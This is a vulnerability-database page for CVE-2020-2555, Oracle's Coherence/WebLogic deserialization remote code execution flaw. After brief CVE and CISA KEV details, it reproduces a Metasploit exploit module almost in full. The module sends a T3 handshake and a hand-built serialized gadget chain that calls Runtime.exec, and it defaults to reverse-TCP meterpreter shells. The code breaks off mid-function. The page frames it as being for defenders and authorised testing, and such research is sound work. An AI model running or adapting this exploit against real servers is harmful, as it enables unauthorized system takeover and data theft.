CVE-2020-2555
unknown
KEV
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
2.5
Description
Multiple Oracle products contain a remote code execution vulnerability that allows an unauthenticated attacker with network access via T3 or HTTP to takeover the affected system. Impacted Oracle products: Oracle Coherence in Fusion Middleware, Oracle Utilities Framework, Oracle Retail Assortment Planning, Oracle Commerce, Oracle Communications Diameter Signaling Router (DSR).
CISA KEV
- Vendor
- Oracle
- Product
- Multiple Products
- Due date
- 2022-05-03
Predictions
Exploit likelihood
99%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'WebLogic Server Deserialization RCE - BadAttributeValueExpException',
'Description' => %q{
There exists a Java object deserialization vulnerability
in multiple versions of WebLogic.
Unauthenticated remote code execution can be achieved
by sending a serialized BadAttributeValueExpException object
over the T3 protocol to vulnerable WebLogic servers.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jang', # Vuln Discovery
'Y4er', # PoC
'Shelby Pace' # Metasploit Module
],
'References' =>
[
[ 'CVE', '2020-2555' ],
[ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ],
[ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ]
],
'Platform' => %w[unix linux win],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Privileged' => false,
'Targets' =>
[
[
'Windows',
{
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }
}
],
[
'Unix',
{
'Platform' => %w[unix linux],
'CmdStagerFlavor' => 'printf',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
}
],
],
'DisclosureDate' => '2020-01-15',
'DefaultTarget' => 0
)
)
register_options([ Opt::RPORT(7001) ])
end
def check
connect
web_req = "GET /console/login/LoginForm.jsp HTTP/1.1\nHost: #{peer}\n\n"
sock.put(web_req)
sleep(2)
res = sock.get_once
versions = [ Gem::Version.new('12.1.3.0.0'), Gem::Version.new('12.2.1.3.0'), Gem::Version.new('12.2.1.4.0') ]
return CheckCode::Unknown('Failed to obtain response from service') unless res
/WebLogic\s+Server\s+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/ =~ res
return CheckCode::Unknown('Failed to detect WebLogic') unless version
@version_no = Gem::Version.new(version)
print_status("WebLogic version detected: #{@version_no}")
return CheckCode::Appears if versions.include?(@version_no)
CheckCode::Detected('Version of WebLogic is not vulnerable')
ensure
disconnect
end
def exploit
super
connect
print_status('Sending handshake...')
t3_handshake
if target.name == 'Windows'
win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })
win_obj.prepend('cmd.exe /c ')
win_obj = build_payload_obj(win_obj)
t3_send(win_obj)
else
execute_cmdstager
end
ensure
disconnect
end
def t3_handshake
# t3 12.2.1\nAS:255
# \nHL:19\nMS:100000
# 00\n\n
shake = '74332031322e322e310a41533a323535'
shake << '0a484c3a31390a4d533a313030303030'
shake << '30300a0a'
sock.put([shake].pack('H*'))
sleep(1)
sock.get_once
end
def build_payload_obj(payload_data)
payload_obj = 'aced' # STREAM_MAGIC
payload_obj << '0005' # STREAM_VERSION
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '002e' # Class name length: 46
payload_obj << '6a617661782e6d616e61' # Class name: javax.management.BadAttributeValueExpException
payload_obj << '67656d656e742e426164'
payload_obj << '41747472696275746556'
payload_obj << '616c7565457870457863'
payload_obj << '657074696f6e'
payload_obj << 'd4e7daab632d4640' # SerialVersionUID
payload_obj << '020001' # Serialization flag, field num = 1
payload_obj << '4c0003' # Field type code: 4c = Object, field name length: 3
payload_obj << '76616c' # Field name: val
payload_obj << '740012' # String, length: 18
payload_obj << '4c6a6176612f6c616e672f4f626a6563743b' # Ljava/lang/Object;
payload_obj << '7872' # end block data, TC_CLASSDESC
payload_obj << '0013' # Class name length: 19
payload_obj << '6a6176612e6c616e672e' # java.lang.Exception
payload_obj << '457863657074696f6e'
payload_obj << 'd0fd1f3e1a3b1cc4' # SerialVersionUID
payload_obj << '020000' # Serializable, No fields
payload_obj << '7872' # end block data, TC_CLASSDESC
payload_obj << '0013' # Class name length: 19
payload_obj << '6a6176612e6c616e672e' # java.lang.Throwable
payload_obj << '5468726f7761626c65'
payload_obj << 'd5c635273977b8cb' # SerialVersionUID
payload_obj << '030004' # ?, then 4 fields
payload_obj << '4c0005' # Field type: Object, field name length: 5
payload_obj << '6361757365' # Field name: cause
payload_obj << '740015' # String, length: 21
payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/Throwable;
payload_obj << '2f5468726f7761626c653b'
payload_obj << '4c000d' # Field type: Object, field name length: 13
payload_obj << '64657461696c4d657373616765' # Field name: detailMessage
payload_obj << '740012' # String, length: 18
payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
payload_obj << '2f537472696e673b'
payload_obj << '5b000a' # Field type: 5b = array, field name length: 10
payload_obj << '737461636b5472616365' # Field name: stackTrace
payload_obj << '74001e' # String, length: 30
payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/StackTraceElement;
payload_obj << '672f537461636b547261'
payload_obj << '6365456c656d656e743b'
payload_obj << '4c0014' # Field type: Object, field name length: 20
payload_obj << '73757070726573736564' # Field name: suppressedExceptions
payload_obj << '457863657074696f6e73'
payload_obj << '740010' # String, length: 16
payload_obj << '4c6a6176612f7574696c' # Ljava/util/List;
payload_obj << '2f4c6973743b'
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0008' # handle?
payload_obj << '7075' # TC_NULL, TC_ARRAY
payload_obj << '72001e' # TC_CLASSDESC, Class name length: 30
payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.StackTraceElement;
payload_obj << '672e537461636b547261'
payload_obj << '6365456c656d656e743b'
payload_obj << '02462a3c3cfd2239' # SerialVersionUID
payload_obj << '020000' # Serializable, No fields
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000001'
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '001b' # Class name length: 27
payload_obj << '6a6176612e6c616e672e' # java.lang.StackTraceElement
payload_obj << '537461636b5472616365'
payload_obj << '456c656d656e74'
payload_obj << '6109c59a2636dd85' # SerialVersionUID
payload_obj << '020004' # Serializable, 4 fields
payload_obj << '49000a' # Field type: 49 = Integer, field name length: 10
payload_obj << '6c696e654e756d626572' # lineNumber
payload_obj << '4c000e' # Field type: Object, field name length: 14
payload_obj << '6465636c6172696e6743'
payload_obj << '6c617373' # declaringClass
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0005' # handle
payload_obj << '4c0008' # Field type: Object, field name length: 8
payload_obj << '66696c654e616d65' # fileName
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0005' # handle
payload_obj << '4c000a' # Field type: Object, field name length: 10
payload_obj << '6d6574686f644e616d65' # methodName
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0005' # handle
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000028'
class_name = Rex::Text.rand_text_alphanumeric(8..14)
formatted_class = class_name.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
payload_obj << '74' # String
payload_obj << class_name.length.to_s(16).rjust(4, '0')
payload_obj << formatted_class # Originally Weblogic_2555 -> PoC class name
payload_obj << '74' # String
payload_obj << (class_name.length + 5).to_s(16).rjust(4, '0')
payload_obj << formatted_class # Originally Weblogic_2555.java
payload_obj << '2e6a617661' # .java
payload_obj << '740004' # String, length: 4
payload_obj << '6d61696e' # main
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '0026' # Class name length: 38
payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableList
payload_obj << '436f6c6c656374696f6e'
payload_obj << '7324556e6d6f64696669'
payload_obj << '61626c654c697374'
payload_obj << 'fc0f2531b5ec8e10' # SerialVersionUID
payload_obj << '020001' # Serializable, 1 field
payload_obj << '4c0004' # Field type: Object, field name length: 4
payload_obj << '6c697374' # list
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0007' # handle
payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
payload_obj << '002c' # Class name length: 44
payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableCollection
payload_obj << '436f6c6c656374696f6e'
payload_obj << '7324556e6d6f64696669'
payload_obj << '61626c65436f6c6c6563'
payload_obj << '74696f6e'
payload_obj << '19420080cb5ef71e' # SerialVersionUID
payload_obj << '020001' # Serializable, 1 field
payload_obj << '4c0001' # Field type: Object, field name length: 1
payload_obj << '63' # Field name: c
payload_obj << '740016' # String, length: 22
payload_obj << '4c6a6176612f7574696c' # Ljava/util/Collection;
payload_obj << '2f436f6c6c656374696f'
payload_obj << '6e3b'
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '0013' # Class name length: 19
payload_obj << '6a6176612e7574696c2e' # java.util.ArrayList
payload_obj << '41727261794c697374'
payload_obj << '7881d21d99c7619d' # SerialVersionUID
payload_obj << '030001' # ?, 1 field
payload_obj << '490004' # Field type: Integer, field name length: 4
payload_obj << '73697a65' # size
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000000'
payload_obj << '7704' # TC_BLOCKDATA, length: 4
payload_obj << '00000000'
payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE
payload_obj << '007e0015' # handle
payload_obj << '78' # TC_ENDBLOCKDATA
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '0024' # Class name length: 36
payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.filter.LimitFilter
payload_obj << '6f6c2e7574696c2e6669'
payload_obj << '6c7465722e4c696d6974'
payload_obj << '46696c746572'
payload_obj << limit_filter_uid # SerialVersionUID
payload_obj << '020006' # Serializable, 6 fields
payload_obj << '49000b' # Field type: Integer, field name length: 11
payload_obj << '6d5f635061676553697a65' # m_cPageSize
payload_obj << '490007' # Field type: Integer, field name length: 7
payload_obj << '6d5f6e50616765' # m_nPage
payload_obj << '4c000c' # Field type: Object, field name length: 12
payload_obj << '6d5f636f6d70617261746f72' # m_comparator
payload_obj << '740016' # String, length: 22
payload_obj << '4c6a6176612f7574696c' # Ljava/util/Comparator;
payload_obj << '2f436f6d70617261746f'
payload_obj << '723b'
payload_obj << '4c0008' # Field type: Object, field name length: 8
payload_obj << '6d5f66696c746572' # m_filter
payload_obj << '74001a' # String, length: 26
payload_obj << '4c636f6d2f74616e676f' # Lcom/tangosol/util/Filter;
payload_obj << '736f6c2f7574696c2f46'
payload_obj << '696c7465723b'
payload_obj << '4c000f' # Field type: Object, field name length: 15
payload_obj << '6d5f6f416e63686f7242' # m_oAnchorBottom
payload_obj << '6f74746f6d'
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0001' # handle
payload_obj << '4c000c' # Field type: Object, field name length: 12
payload_obj << '6d5f6f416e63686f72546f70' # m_oAnchorTop
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0001' # handle
unless @version_no == Gem::Version.new('12.1.3.0.0')
payload_obj << add_class_desc
end
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000000'
payload_obj << '00000000'
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '002c' # Class name length: 44
payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ChainedExtractor
payload_obj << '6f6c2e7574696c2e6578'
payload_obj << '74726163746f722e4368'
payload_obj << '61696e65644578747261'
payload_obj << '63746f72'
payload_obj << chained_extractor_uid # SerialVersionUID
payload_obj << '020000' # Serializable, no fields
payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
payload_obj << '0036' # Class name length: 54
payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractCompositeExtractor
payload_obj << '6f6c2e7574696c2e6578'
payload_obj << '74726163746f722e4162'
payload_obj << '737472616374436f6d70'
payload_obj << '6f736974654578747261'
payload_obj << '63746f72'
payload_obj << '086b3d8c05690f44' # SerialVersionUID
payload_obj << '020001' # Serializable, 1 field
payload_obj << '5b000c' # Field type: Array, field name length: 12
payload_obj << '6d5f61457874726163746f72' # m_aExtractor
payload_obj << '740023' # String, length: 35
payload_obj << '5b4c636f6d2f74616e67' # [Lcom/tangosol/util/ValueExtractor;
payload_obj << '6f736f6c2f7574696c2f'
payload_obj << '56616c75654578747261'
payload_obj << '63746f723b'
payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
payload_obj << '002d' # Class name length: 45
payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractExtractor
payload_obj << '6f6c2e7574696c2e6578'
payload_obj << '74726163746f722e4162'
payload_obj << '73747261637445787472'
payload_obj << '6163746f72'
payload_obj << abstract_extractor_uid # SerialVersionUID
payload_obj << '020001' # Serializable, 1 field
payload_obj << '490009' # Field type: Integer, field name length: 9
payload_obj << '6d5f6e546172676574' # m_nTarget
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000000'
payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
payload_obj << '0032' # Class name length: 50
payload_obj << '5b4c636f6d2e74616e67' # [Lcom.tangosol.util.extractor.ReflectionExtractor;
payload_obj << '6f736f6c2e7574696c2e'
payload_obj << '657874726163746f722e'
payload_obj << '5265666c656374696f6e'
payload_obj << '457874726163746f723b'
payload_obj << 'dd8b89aed70273ca' # SerialVersionUID
payload_obj << '020000' # Serializable, no fields
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000003'
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '002f' # Class name length: 47
payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ReflectionExtractor
payload_obj << '6f6c2e7574696c2e6578'
payload_obj << '74726163746f722e5265'
payload_obj << '666c656374696f6e4578'
payload_obj << '74726163746f72'
payload_obj << reflection_extractor_uid # SerialVersionUID
payload_obj << '02000' # Serializable, variable fields orig: 020002
payload_obj << reflect_extract_count
payload_obj << '5b0009' # Field type: Array, field name length: 9
payload_obj << '6d5f616f506172616d' # m_aoParam
payload_obj << '740013' # String, length: 19
payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/Object;
payload_obj << '672f4f626a6563743b'
payload_obj << add_sect
payload_obj << '4c0009' # Object, length: 9
payload_obj << '6d5f734d6574686f64' # m_sMethod
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0005' # handle
payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE
payload_obj << (change_handle? ? '007e001d' : '007e001e')
payload_obj << '00000000'
payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
payload_obj << '0013' # Class name length: 19
payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Object;
payload_obj << '672e4f626a6563743b'
payload_obj << '90ce589f1073296c' # SerialVersionUID
payload_obj << '020000' # Serializable, no fields
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000002'
payload_obj << '74000a' # String, length: 10
payload_obj << '67657452756e74696d65' # getRuntime
payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
payload_obj << '0012' # Class name length: 18
payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Class;
payload_obj << '672e436c6173733b'
payload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID
payload_obj << '020000' # Serializable, no fields
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000000'
payload_obj << add_tc_null
payload_obj << '740009' # String, length: 9
payload_obj << '6765744d6574686f64' # getMethod
payload_obj << '7371' # TC_OBJECT, TC_REFERENCE
payload_obj << (change_handle? ? '007e0021' : '007e0022')
payload_obj << '00000000'
payload_obj << '7571' # TC_ARRAY, TC_REFERENCE
payload_obj << (change_handle? ? '007e0024' : '007e0025')
payload_obj << '00000002' # array size: 2
payload_obj << '7075' # TC_NULL, TC_ARRAY
payload_obj << '71' # TC_REFERENCE
payload_obj << (change_handle? ? '007e0024' : '007e0025')
payload_obj << '00000000'
payload_obj << add_tc_null
payload_obj << '740006' # TC_STRING, length: 6
payload_obj << '696e766f6b65' # invoke
payload_obj << '7371' # TC_OBJECT, TC_REFERENCE
payload_obj << (change_handle? ? '007e0021' : '007e0022')
payload_obj << '00000000'
payload_obj << '7571' # TC_ARRAY, TC_REFERENCE
payload_obj << (change_handle? ? '007e0024' : '007e0025')
payload_obj << '00000001'
payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
payload_obj << '0013' # Class name length: 19
payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.String;
payload_obj << '672e537472696e673b'
payload_obj << 'add256e7e91d7b47' # SerialVersionUID
payload_obj << '020000' # Serializable, no fields
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000003'
payload_bin = format_payload(payload_data)
payload_obj << payload_bin
# Original data
# ---------------------------
# payload_obj << '740007' # String, length: 7
# payload_obj << '2f62696e2f7368' # /bin/sh
# payload_obj << '740002' # String, length: 2
# payload_obj << '2d63' # -c
# payload_obj << '740017' # String, length: 23
# payload_obj << '746f756368202f746d70' # touch /tmp/blah_ze_blah
# payload_obj << '2f626c61685f7a655f62'
# payload_obj << '6c6168'
# ---------------------------
payload_obj << add_tc_null
payload_obj << '740004' # String, length: 4
payload_obj << '65786563' # exec
payload_obj << '7070' # TC_NULL, TC_NULL
payload_obj << '7672' # TC_CLASS, TC_CLASSDESC
payload_obj << '0011' # Class name length: 17
payload_obj << '6a6176612e6c616e672e' # java.lang.Runtime
payload_obj << '52756e74696d65'
payload_obj << '00000000000000000000'
payload_obj << '00'
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
end
def change_handle?
@version_no == Gem::Version.new('12.1.3.0.0')
end
def limit_filter_uid
case @version_no
when Gem::Version.new('12.1.3.0.0')
'99022596d7b45953'
when Gem::Version.new('12.2.1.3.0')
'ab2901b976c4e271'
else
'954e4590be89865f'
end
end
def chained_extractor_uid
case @version_no
when Gem::Version.new('12.1.3.0.0')
'889f81b0945d5b7f'
when Gem::Version.new('12.2.1.3.0')
'06ee10433a4cc4b4'
else
'435b250b72f63db5'
end
end
def abstract_extractor_uid
case @version_no
when Gem::Version.new('12.1.3.0.0')
'658195303e723821'
when Gem::Version.new('12.2.1.3.0')
'752289ad4d460138'
else
'9b1be18ed70100e5'
end
end
def reflection_extractor_uid
case @version_no
when Gem::Version.new('12.1.3.0.0')
'ee7ae995c02fb4a2'
when Gem::Version.new('12.2.1.3.0')
'87973791b26429dd'
else
'1f62f564b951b614'
end
end
def reflect_extract_count
case @version_no
when Gem::Version.new('12.2.1.3.0')
'3'
else
'2'
end
end
def add_sect
sect = ''
if @version_no == Gem::Version.new('12.2.1.3.0')
sect << '4c0011' # Object, length: 17
sect << '6d5f657874726163746f' # m_extractorCached
sect << '72436163686564'
sect << '71' # TC_REFERENCE
sect << '007e0001' # handle
end
sect
end
def add_class_desc
class_desc = ''
class_desc << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
class_desc << '0034' # Class name length: 52
class_desc << '636f6d2e74616e676f73' # com.tangosol.util.filter.AbstractQueryRecorderFilter
class_desc << '6f6c2e7574696c2e6669'
class_desc << '6c7465722e4162737472'
class_desc << '61637451756572795265'
class_desc << '636f7264657246696c74'
class_desc << '6572'
class_desc << 'f3b98201f680eb90' # SerialVersionUID
class_desc << '020000' # Serializable, no fields
end
def add_tc_null
return '70' if @version_no == Gem::Version.new('12.2.1.3.0')
''
end
def t3_send(payload_obj)
print_status('Sending object...')
request_obj = '000009f3' # Original packet length
request_obj << '016501' # CMD_IDENTIFY_REQUEST, flags
request_obj << 'ffffffffffffffff'
request_obj << '00000071'
request_obj << '0000ea60'
request_obj << '00000018432ec6'
request_obj << 'a2a63985b5af7d63e643'
request_obj << '83f42a6d92c9e9af0f94'
request_obj << '72027973720078720178'
request_obj << '720278700000000c0000'
request_obj << '00020000000000000000'
request_obj << '00000001007070707070'
request_obj << '700000000c0000000200'
request_obj << '00000000000000000000'
request_obj << '01007006'
request_obj << 'fe010000' # separator
request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
request_obj << '001d' # Class name length: 29
request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
request_obj << '6a766d2e436c61737354'
request_obj << '61626c65456e747279'
request_obj << '2f52658157f4f9ed' # SerialVersionUID
request_obj << '0c0000' # flags?
request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
request_obj << '0024' # Class name length: 36
request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
request_obj << '6f6d6d6f6e2e696e7465'
request_obj << '726e616c2e5061636b61'
request_obj << '6765496e666f'
request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
request_obj << '020009' # Serializable, 9 fields
request_obj << '490005' # Field type: Int, field name length: 5
request_obj << '6d616a6f72' # major
request_obj << '490005' # Field type: Int, field name length: 5
request_obj << '6d696e6f72' # minor
request_obj << '49000b' # Field type: Int, field name length: 11
request_obj << '70617463685570646174' # patchUpdate
request_obj << '65'
request_obj << '49000c' # Field type: Int, field name length: 12
request_obj << '726f6c6c696e67506174' # rollingPatch
request_obj << '6368'
request_obj << '49000b' # Field type: Int, field name length: 11
request_obj << '73657276696365506163' # servicePack
request_obj << '6b'
request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
request_obj << '74656d706f7261727950' # temporaryPatch
request_obj << '61746368'
request_obj << '4c0009' # Field type: Object, field name length: 9
request_obj << '696d706c5469746c65' # implTitle
request_obj << '740012' # String, length: 18
request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
request_obj << '2f537472696e673b'
request_obj << '4c000a' # Field type: Object, field name length: 10
request_obj << '696d706c56656e646f72' # implVendor
request_obj << '71007e0003' # TC_REFERENCE, handle
request_obj << '4c000b' # Field type: Object, field name length: 11
request_obj << '696d706c56657273696f6e' # implVersion
request_obj << '71007e0003' # TC_REFERENCE, handle
request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
request_obj << '7702' # TC_ENDBLOCKDATA
request_obj << '000078'
request_obj << 'fe010000' # separator
request_obj << payload_obj
request_obj << 'fe010000' # separator
request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
request_obj << '001d' # Class name length: 29
request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
request_obj << '6a766d2e436c61737354'
request_obj << '61626c65456e747279'
request_obj << '2f52658157f4f9ed' # SerialVersionUID
request_obj << '0c0000'
request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
request_obj << '0021' # Class name length: 33
request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo
request_obj << '6f6d6d6f6e2e696e7465'
request_obj << '726e616c2e5065657249'
request_obj << '6e666f'
request_obj << '585474f39bc908f1' # SerialVersionUID
request_obj << '020007' # Serializable, 7 fields
request_obj << '490005' # Field type: Int, field name length: 5
request_obj << '6d616a6f72' # major
request_obj << '490005' # Field type: Int, field name length: 5
request_obj << '6d696e6f72' # minor
request_obj << '49000b' # Field type: Int, field name length: 11
request_obj << '70617463685570646174' # patchUpdate
request_obj << '65'
request_obj << '49000c' # Field type: Int, field name length: 12
request_obj << '726f6c6c696e67506174' # rollingPatch
request_obj << '6368'
request_obj << '49000b' # Field type: Int, field name length: 11
request_obj << '73657276696365506163' # servicePack
request_obj << '6b'
request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
request_obj << '74656d706f7261727950' # temporaryPatch
request_obj << '61746368'
request_obj << '5b0008' # Field type: Array, field name length: 8
request_obj << '7061636b61676573' # packages
request_obj << '740027' # String, length: 39
request_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo;
request_obj << '2f636f6d6d6f6e2f696e'
request_obj << '7465726e616c2f506163'
request_obj << '6b616765496e666f3b'
request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
request_obj << '0024' # Class name length: 36
request_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo
request_obj << '6f6d6d6f6e2e696e7465'
request_obj << '726e616c2e5665727369'
request_obj << '6f6e496e666f'
request_obj << '972245516452463e' # SerialVersionUID
request_obj << '020003' # Serializable, 3 fields
request_obj << '5b0008' # Field type: Array, field name length: 8
request_obj << '7061636b61676573' # packages
request_obj << '71007e0003' # TC_REFERENCE, handle
request_obj << '4c000e' # Field type: Object, field name length: 14
request_obj << '72656c65617365566572' # releaseVersion
request_obj << '73696f6e'
request_obj << '740012' # String, length: 18
request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
request_obj << '2f537472696e673b'
request_obj << '5b0012' # Field type: Array, field name length: 18
request_obj << '76657273696f6e496e66' # versionInfoAsBytes
request_obj << '6f41734279746573'
request_obj << '740002' # String, length: 2
request_obj << '5b42' # [B
request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
request_obj << '0024' # Class name length: 36
request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
request_obj << '6f6d6d6f6e2e696e7465'
request_obj << '726e616c2e5061636b61'
request_obj << '6765496e666f'
request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
request_obj << '020009' # Serializable, 9 fields
request_obj << '490005' # Field type: Int, field name length: 5
request_obj << '6d616a6f72' # major
request_obj << '490005' # Field type: Int, field name length: 5
request_obj << '6d696e6f72' # minor
request_obj << '49000b' # Field type: Int, field name length: 11
request_obj << '70617463685570646174' # patchUpdate
request_obj << '65'
request_obj << '49000c' # Field type: Int, field name length: 12
request_obj << '726f6c6c696e67506174' # rollingPatch
request_obj << '6368'
request_obj << '49000b' # Field type: Int, field name length: 11
request_obj << '73657276696365506163' # servicePack
request_obj << '6b'
request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
request_obj << '74656d706f7261727950' # temporaryPatch
request_obj << '61746368'
request_obj << '4c0009' # Field type: Object, field name length: 9
request_obj << '696d706c5469746c65' # implTitle
request_obj << '71007e0005' # TC_REFERENCE, handle
request_obj << '4c000a' # Field type: Object, field name length: 10
request_obj << '696d706c56656e646f72' # implVendor
request_obj << '71007e0005' # TC_REFERENCE, handle
request_obj << '4c000b' # Field type: Object, field name length: 11
request_obj << '696d706c56657273696f' # implVersion
request_obj << '6e'
request_obj << '71007e0005' # TC_REFERENCE, handle
request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
request_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA
request_obj << 'fe00ff' # separator
request_obj << 'fe010000'
request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
request_obj << '0013' # Class name length: 19
request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
request_obj << '6a766d2e4a564d4944'
request_obj << 'dc49c23ede121e2a' # SerialVersionUID
request_obj << '0c0000'
request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
request_obj << '4621'
request_obj << '000000000000000000'
request_obj << '09' # length: 9
request_obj << '3132372e302e312e31' # 127.0.1.1
request_obj << '000b' # length: 11
request_obj << '75732d6c2d627265656e' # us-l-breens
request_obj << '73'
request_obj << 'a53caff10000000700'
request_obj << '001b59'
request_obj << 'ffffffffffffffffffff'
request_obj << 'ffffffffffffffffffff'
request_obj << 'ffffffff'
request_obj << '0078'
request_obj << 'fe010000' # separator
request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
request_obj << '0013' # Class name length: 19
request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
request_obj << '6a766d2e4a564d4944'
request_obj << 'dc49c23ede121e2a' # SerialVersionUID
request_obj << '0c0000'
request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
request_obj << '1d0181401281'
request_obj << '34bf427600093132372e'
request_obj << '302e312e31a53caff1'
request_obj << '000000000078'
new_len = (request_obj.length / 2).to_s(16).rjust(8, '0')
request_obj[0, 8] = new_len
sock.put([request_obj].pack('H*'))
sleep(1)
end
def format_payload(payload_cmd)
print_status('Formatting payload...')
payload_arr = payload_cmd.split(' ', 3)
formatted_payload = ''
payload_arr.each do |part|
formatted_payload << '74' # denotes a string
formatted_payload << part.length.to_s(16).rjust(4, '0')
